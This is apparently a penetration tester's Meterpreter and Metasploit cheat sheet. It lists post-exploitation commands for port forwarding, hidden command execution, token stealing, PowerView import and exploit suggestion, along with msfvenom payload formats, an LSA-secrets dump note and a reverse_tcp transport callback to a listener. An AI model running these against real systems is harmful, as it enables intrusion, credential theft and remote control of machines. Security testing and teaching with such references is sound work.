======
portfwd add -l 1111 -p 22 -r Target2
screenshot -p file.jpg
idletime
uictl
execute -f cmd.exe -i -H
execute -f cmd.exe -H -a "/c net users"
steal_token PID
execute -f cmd.exe -i -H -t
powershell_execute "Get-ChildItem C:\Users\user -Recurse"
powershell_import /path/to/powerview.ps1
exploit -j
setg RHOSTS 1.2.3.4
meterpreter> run post/multi/recon/local_exploit_suggester
msfvenom --list payloads
asp, perl, jsp, python, jar, php, linux (elf), windows (exe, dll, ps1, psh-cmd)
Dumps LSA Secrets. You can also use Kiwi's lsa_dump_secrets (probably better).
set AutoRunScript post/windows/manage/migrate
transport list
transport add -t reverse_tcp -l 10.1.1.1 -p 5555